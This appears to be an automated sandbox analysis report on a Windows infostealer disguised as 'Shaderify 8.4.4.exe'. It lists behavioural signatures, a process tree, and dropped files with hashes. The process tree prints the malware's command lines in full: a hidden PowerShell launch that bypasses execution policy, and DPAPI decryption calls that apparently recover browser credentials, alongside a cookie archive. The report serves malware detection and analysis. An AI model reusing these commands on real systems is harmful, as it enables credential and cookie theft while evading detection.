Analysis

  • max time kernel
    134s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-06-2024 09:47

General

  • Target

    Shaderify 8.4.4.exe

  • Size

    53.4MB

  • MD5

    505ea174fba0dea1147a32496c847101

  • SHA1

    879cc448363cf6bfbbdf2a45f652fe4ca6720f98

  • SHA256

    dd4ce9e1a9daf52b9264ed81d72af9a0c7037d4f09af1883bce0faaeef91e914

  • SHA512

    2a952ac23fdbced88fa302346b26a853f1bc1824958dcb80e42df5ad37733b0349d3a207c2fa1aab8137048324f5aa2515b877c21dbcb6a0429ab59a5f1d9bc7

  • SSDEEP

    786432:MOHETki1abUwp4cKt3pIlWf9KazQTqbuUGpudQ1EyU2FXG73mPaGrbaBq5H/p/Qk:H1rycKt3pG6VbuUuFUv2PaGSq7/Qc5

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Shaderify 8.4.4.exe
    "C:\Users\Admin\AppData\Local\Temp\Shaderify 8.4.4.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3560
    • C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
      C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2472
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2640
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5016
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zyipflkp\zyipflkp.cmdline"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4900
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES67C2.tmp" "c:\Users\Admin\AppData\Local\Temp\zyipflkp\CSC442EA518B586492B98A0FAB9AEB2D3.TMP"
              6⤵
                PID:1572
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "tasklist"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5072
          • C:\Windows\system32\tasklist.exe
            tasklist
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:448
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,143,8,155,162,221,184,73,71,232,222,51,145,193,115,97,9,130,241,224,103,6,120,76,14,50,215,61,172,124,159,238,253,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,99,253,1,12,244,37,76,196,250,204,121,176,50,84,44,171,164,192,123,43,73,12,147,211,193,42,15,39,95,26,62,201,48,0,0,0,199,59,41,134,72,150,192,161,125,143,33,114,13,155,6,139,72,133,43,120,135,38,24,218,101,6,176,207,210,73,64,67,238,175,209,152,192,141,196,93,4,159,79,39,108,201,81,243,64,0,0,0,47,182,203,76,22,230,198,116,189,169,35,195,147,254,206,160,141,223,22,83,122,129,208,253,101,155,106,250,254,105,139,55,133,60,233,210,239,137,168,177,165,144,32,46,241,126,232,206,117,88,178,220,23,105,81,227,111,16,111,158,78,1,233,96), $null, 'CurrentUser')"
          3⤵
          • An obfuscated cmd.exe command-line is typically used to evade detection.
          • Suspicious use of WriteProcessMemory
          PID:2584
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,143,8,155,162,221,184,73,71,232,222,51,145,193,115,97,9,130,241,224,103,6,120,76,14,50,215,61,172,124,159,238,253,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,99,253,1,12,244,37,76,196,250,204,121,176,50,84,44,171,164,192,123,43,73,12,147,211,193,42,15,39,95,26,62,201,48,0,0,0,199,59,41,134,72,150,192,161,125,143,33,114,13,155,6,139,72,133,43,120,135,38,24,218,101,6,176,207,210,73,64,67,238,175,209,152,192,141,196,93,4,159,79,39,108,201,81,243,64,0,0,0,47,182,203,76,22,230,198,116,189,169,35,195,147,254,206,160,141,223,22,83,122,129,208,253,101,155,106,250,254,105,139,55,133,60,233,210,239,137,168,177,165,144,32,46,241,126,232,206,117,88,178,220,23,105,81,227,111,16,111,158,78,1,233,96), $null, 'CurrentUser')
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1240
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,204,23,200,182,199,212,101,234,51,160,20,157,150,146,144,151,39,93,3,161,164,186,212,226,57,101,160,86,167,155,8,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,184,144,186,180,174,237,163,184,95,232,101,63,21,177,75,98,215,199,36,30,80,192,146,63,77,115,21,70,102,42,166,165,48,0,0,0,117,126,67,77,96,159,142,116,174,11,86,56,11,231,226,145,7,63,8,207,34,20,54,206,115,112,214,184,19,252,2,122,95,58,116,12,104,15,223,163,49,195,63,147,96,226,86,246,64,0,0,0,114,72,103,37,120,230,180,221,228,136,240,64,66,22,120,71,192,126,130,46,213,57,1,27,188,210,151,225,138,111,6,223,99,131,127,243,133,142,61,229,60,15,180,41,8,227,3,169,15,181,32,167,8,219,218,233,217,48,253,19,227,158,119,122), $null, 'CurrentUser')"
          3⤵
          • An obfuscated cmd.exe command-line is typically used to evade detection.
          • Suspicious use of WriteProcessMemory
          PID:4812
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,204,23,200,182,199,212,101,234,51,160,20,157,150,146,144,151,39,93,3,161,164,186,212,226,57,101,160,86,167,155,8,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,184,144,186,180,174,237,163,184,95,232,101,63,21,177,75,98,215,199,36,30,80,192,146,63,77,115,21,70,102,42,166,165,48,0,0,0,117,126,67,77,96,159,142,116,174,11,86,56,11,231,226,145,7,63,8,207,34,20,54,206,115,112,214,184,19,252,2,122,95,58,116,12,104,15,223,163,49,195,63,147,96,226,86,246,64,0,0,0,114,72,103,37,120,230,180,221,228,136,240,64,66,22,120,71,192,126,130,46,213,57,1,27,188,210,151,225,138,111,6,223,99,131,127,243,133,142,61,229,60,15,180,41,8,227,3,169,15,181,32,167,8,219,218,233,217,48,253,19,227,158,119,122), $null, 'CurrentUser')
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4208
        • C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
          "C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe" --type=gpu-process --field-trial-handle=1804,16734063316386581723,925908392957392502,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1812 /prefetch:2
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:736
        • C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
          "C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1804,16734063316386581723,925908392957392502,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2200 /prefetch:8
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          PID:1252
        • C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
          "C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe" --type=gpu-process --field-trial-handle=1804,16734063316386581723,925908392957392502,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          PID:1240
    • C:\Windows\System32\CompPkgSrv.exe
      C:\Windows\System32\CompPkgSrv.exe -Embedding
      1⤵
        PID:5104

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\edge\Updater\Get-Clipboard.ps1

        Filesize

        3KB

        MD5

        52cc110bb3777aa6bba7900630d4eb49

        SHA1

        3663dc658fd13d407e49781d1a5c2aa203c252fc

        SHA256

        892a9edb03db3fd88fecc1e1a2f56a7339f16f6734e8d77e6538ea2c8c9026d6

        SHA512

        89b80d2783e902d68ffd08b6f3fb1848ae6e6c4bf2d7a1e4afdac970b2ee6ffcc58116cdd6234e3d6278eb9413d36aafe62b5beca24a0846575d12af0c5112ab

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        f48896adf9a23882050cdff97f610a7f

        SHA1

        4c5a610df62834d43f470cae7e851946530e3086

        SHA256

        3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78

        SHA512

        16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        c3d0e052ba84a5a94a12f82b5523b45e

        SHA1

        18c9412da40f1d565c47dc150f782672a8913baa

        SHA256

        0937d02e49f29b26b70ae49a9709208b79a25cb2b927251e5ef2cce71942638d

        SHA512

        78a4c052734d4540e190e37c674302d1a234c9d83e0761b1337241519685dbe486b65a8d58919bc2e166c8a58395895fd1385b8a47f5fed4506dbf132ddfc607

      • C:\Users\Admin\AppData\Local\Temp\09af70a9-862f-4d0a-89c6-5ab85ea5bb83.tmp.node

        Filesize

        1.4MB

        MD5

        56192831a7f808874207ba593f464415

        SHA1

        e0c18c72a62692d856da1f8988b0bc9c8088d2aa

        SHA256

        6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c

        SHA512

        c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33

      • C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Admincookies.zip

        Filesize

        22B

        MD5

        76cdb2bad9582d23c1f6f4d868218d6c

        SHA1

        b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

        SHA256

        8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

        SHA512

        5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

      • C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\D3DCompiler_47.dll

        Filesize

        4.3MB

        MD5

        7641e39b7da4077084d2afe7c31032e0

        SHA1

        2256644f69435ff2fee76deb04d918083960d1eb

        SHA256

        44422e6936dc72b7ac5ed16bb8bcae164b7554513e52efb66a3e942cec328a47

        SHA512

        8010e1cb17fa18bbf72d8344e1d63ded7cef7be6e7c13434fa6d8e22ce1d58a4d426959bdcb031502d4b145e29cb111af929fcbc66001111fbc6d7a19e8800a5

      • C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\chrome_100_percent.pak

        Filesize

        121KB

        MD5

        06baf0ad34e0231bd76651203dba8326

        SHA1

        a5f99ecdcc06dec9d7f9ce0a8c66e46969117391

        SHA256

        5ae14147992a92548bcad76867dd88cdfcdb69d951c8720920cce6fb135e3189

        SHA512

        aff6616e56781ebb925a0ca146245ad3b2827250b32261c0c7c0d5b10b20a343a17fc3761c95d93104163e77b2eae3f1f9cbd3cb2b377f49b42bea39bdd09b91

      • C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\chrome_200_percent.pak

        Filesize

        181KB

        MD5

        57c27201e7cd33471da7ec205fe9973c

        SHA1

        a8e7bce09c4cbdae2797611b2be8aeb5491036f9

        SHA256

        dd8146b2ee289e4d54a4a0f1fd3b2f61b979c6a2baaba96a406d96c3f4fdb33b

        SHA512

        57258aa169bec66abf0f45a3e026bb68751fb970b74bd0cb465607fa3b2a89967e832d92d8f675f0449bb6662fcb7786d05f0597124cc8e18bb99a47245779b4

      • C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\ffmpeg.dll

        Filesize

        2.7MB

        MD5

        eabfc10d56cb44a86493cb2f8ca7aab2

        SHA1

        09d7e87f43527333cd021329d6c2f4e8bd8ddab5

        SHA256

        42a2a996ac433ac33a22776b8418a82753557093d90147b7951138b5c83924b6

        SHA512

        ee31e3539fba9e5969a9f38c428f586de2dd7630cb5d8c5e3c2c934b5881f8176b8ab6ef6397c1ce4fa6ccf3ee9615225c7afa0e0b28c6fc23974e8b96625dec

      • C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\icudtl.dat

        Filesize

        10.0MB

        MD5

        ad2988770b8cb3281a28783ad833a201

        SHA1

        94b7586ee187d9b58405485f4c551b55615f11b5

        SHA256

        df876c7af43ed93eec6aea4d2d55c805009c219653cdeb368f1d048f4922b108

        SHA512

        f27e542a9c6c60fa28c5b7cc2818079341ef93aef3bbcadecad2dc11aff5b1592b19c7ebfa543ea42a3cbfec26a668641b255545fb0912056e25e852c2dedd01

      • C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\libegl.dll

        Filesize

        438KB

        MD5

        660a9ae1282e6205fc0a51e64470eb5b

        SHA1

        f91a9c9559f51a8f33a552f0145ed9e706909de8

        SHA256

        f2a841b6ef320f226965c7cb01fbc4709fc31425e490a3edfa20147ce3656c85

        SHA512

        20bed2bed042033e3d8b077f9d66bce67922aaec180cc3777f20560219226b7efc73932bb87445afda4e3877472ddcd307215d23954cd082051437e5f2224263

      • C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\libglesv2.dll

        Filesize

        7.3MB

        MD5

        bc45db0195aa369cc3c572e4e9eefc7e

        SHA1

        b880ca4933656be52f027028af5ef8a3b7e07e97

        SHA256

        a81729fd6ee2d64dfc47501a1d53794cdeee5c1daa3751f7554aea2503686d10

        SHA512

        dd8c39947e7d767fbdccf90c5b3eaedf3937b43c55200d2199107333b63ac09e5356c286618874fac841e1357dd927e0c70b5066c1feeedd8cc6c0fba605ee5f

      • C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\locales\en-US.pak

        Filesize

        83KB

        MD5

        bd8f7b719110342b7cefb16ddd05ec55

        SHA1

        82a79aeaa1dd4b1464b67053ba1766a4498c13e7

        SHA256

        d1d3f892be16329c79f9a8ee8c5fa1c9fb46d17edfeb56a3d9407f9d7587a0de

        SHA512

        7cd1493e59e87c70927e66769eb200f79a57e1eb1223af4eb4064088571893d3e32cbc4b5ece568fd308992aad65684aa280dc9834f2b5d327bdee514b046e5e

      • C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\resources.pak

        Filesize

        4.8MB

        MD5

        d13873f6fb051266deb3599b14535806

        SHA1

        143782c0ce5a5773ae0aae7a22377c8a6d18a5b2

        SHA256

        7b953443e3cd54a0a4775528b52fbfe5ebecbc2c71731600ed0999d227969506

        SHA512

        1ab38fcb70d1958c74da2493459532b52a04b884009509a1ac8dd39f6e9e670658a52f4d19ef57f1bc71dccfdd6ceedbc18034bbcad0b500d75a97c74aac6939

      • C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\resources\app.asar

        Filesize

        12.3MB

        MD5

        e95d6f8d09a92e654aadf7a4117550cf

        SHA1

        8d1b84e9f8fae63fe5b598bdb767d1c062bf8ffe

        SHA256

        781877bb7bbe002e7dacbadc65241df8ae5842b8db297f61c8786fb8e7bab09b

        SHA512

        517c6e2a76a52880a08c18a0ea6201fdff385ed7485b462711eacf21dc32bf446539dc297c2517e9b049e0d9c3c5e1ea99ead5804ff3d90c728cf293e5589d2f

      • C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\v8_context_snapshot.bin

        Filesize

        168KB

        MD5

        c2208c06c8ff81bca3c092cc42b8df1b

        SHA1

        f7b9faa9ba0e72d062f68642a02cc8f3fed49910

        SHA256

        4a67de195878d290f49b503b83e415917b8bbcbd9936b07a5d33b48e9bc6e0a3

        SHA512

        6c3c370dd086a976c44d4059a315bd3bcbb50961aa34734e65a40d861cffca9090d47cec74575afe23952e394e4845bda2d8798eebe01fb54a7a6288bce238f5

      • C:\Users\Admin\AppData\Local\Temp\RES67C2.tmp

        Filesize

        1KB

        MD5

        ab545f8c3e530deeab49bae1185a7cc4

        SHA1

        5f5a853684e7bab4084ce1eaa581d4aa6503d913

        SHA256

        6108e7cce3de3727da00080164f61d375e726e83cb4a60d116922916f5414d33

        SHA512

        afea1426ebe23d9327a7e2bc7b136e8dfefcf074c7000fae4412904f697afc1dacfd4af273bd263807bf6449f82c616ab9cd4ecbc85313a0641b69c4110d0ddd

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k3jjdbmk.fpn.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\nsf541C.tmp\StdUtils.dll

        Filesize

        101KB

        MD5

        33b4e69e7835e18b9437623367dd1787

        SHA1

        53afa03edaf931abdc2d828e5a2c89ad573d926c

        SHA256

        72d38ef115e71fc73dc5978987c583fc8c6b50ff12e4a5d30649a4d164a8b6ae

        SHA512

        ca890e785d1a0a7e0b4a748416fba417826ae66b46e600f407d4e795b444612a8b830f579f2cf5b6e051bea800604f34f8801cc3daf05c8d29ad05bcda454a77

      • C:\Users\Admin\AppData\Local\Temp\nsf541C.tmp\System.dll

        Filesize

        11KB

        MD5

        75ed96254fbf894e42058062b4b4f0d1

        SHA1

        996503f1383b49021eb3427bc28d13b5bbd11977

        SHA256

        a632d74332b3f08f834c732a103dafeb09a540823a2217ca7f49159755e8f1d7

        SHA512

        58174896db81d481947b8745dafe3a02c150f3938bb4543256e8cce1145154e016d481df9fe68dac6d48407c62cbe20753320ebd5fe5e84806d07ce78e0eb0c4

      • C:\Users\Admin\AppData\Local\Temp\nsf541C.tmp\nsis7z.dll

        Filesize

        391KB

        MD5

        c6a070b3e68b292bb0efc9b26e85e9cc

        SHA1

        5a922b96eda6595a68fd0a9051236162ff2e2ada

        SHA256

        66ac8bd1f273a73e17a3f31d6add739d3cb0330a6417faeda11a9cae00b62d8b

        SHA512

        8eff8fc16f5bb574bd9483e3b217b67a8986e31497368c06fdaa3a1e93a40aee94a5b31729d01905157b0ae1e556a402f43cd29a4d30a0587e1ec334458a44e8

      • C:\Users\Admin\AppData\Local\Temp\zyipflkp\zyipflkp.dll

        Filesize

        3KB

        MD5

        29a18389399044ccdc4150bfbccae7a5

        SHA1

        d3df3ed73c9583ebe50d3abc283f291a7488a093

        SHA256

        f9166045d42e1306b7c4dd84bd4261455bc714744ff2b65ceb8dfa5c2638b997

        SHA512

        425a85d4be9626ad50501cdf47797c3bbf52f17d7bb71cdee7fbc3948205edf69259fdeb17819af7b9cac55f2cd2d7b727bf603a2d1b6b9e2f9baf8e5a53754b

      • \??\c:\Users\Admin\AppData\Local\Temp\zyipflkp\CSC442EA518B586492B98A0FAB9AEB2D3.TMP

        Filesize

        652B

        MD5

        e5821ce688f3aed0b2468931775a2f2a

        SHA1

        7a3e896eb39287e3b455f05eae33e179cc0b5d81

        SHA256

        c113b69c698b779ee3075aa798a56f8c525eb7c791bba4071c898af6081e9e8d

        SHA512

        d4229d6c161eae666eeae18849aa09476df6ef019a76d2ddbf9172e6e6595e8fb33125175a35423ecf2fcf4fbf88d2d1a1754440a088877e6055f7442cb21191

      • \??\c:\Users\Admin\AppData\Local\Temp\zyipflkp\zyipflkp.0.cs

        Filesize

        426B

        MD5

        b462a7b0998b386a2047c941506f7c1b

        SHA1

        61e8aa007164305a51fa2f1cebaf3f8e60a6a59f

        SHA256

        a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35

        SHA512

        eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

      • \??\c:\Users\Admin\AppData\Local\Temp\zyipflkp\zyipflkp.cmdline

        Filesize

        369B

        MD5

        f3e706210daeebba6f59d0874c753703

        SHA1

        864f54feb589cf24ba69a0150941b7199b09f977

        SHA256

        24643f87d81dce65142b56f13f818c2d41a72d7b107da21c66ce18fd7f013a1f

        SHA512

        14152fac106302c8e1b11ee2699f1e7437bd519a993048c2379b64113845baf57918e0cfbab787f5b5c88679011fe66f50478392b1d27ccb004e8ec420159fef

      • memory/736-241-0x00007FFC83400000-0x00007FFC83401000-memory.dmp

        Filesize

        4KB

      • memory/1240-210-0x00000271FC650000-0x00000271FC6A0000-memory.dmp

        Filesize

        320KB

      • memory/5016-198-0x000001D1DC3E0000-0x000001D1DC3E8000-memory.dmp

        Filesize

        32KB

      • memory/5016-182-0x000001D1F68C0000-0x000001D1F68E2000-memory.dmp

        Filesize

        136KB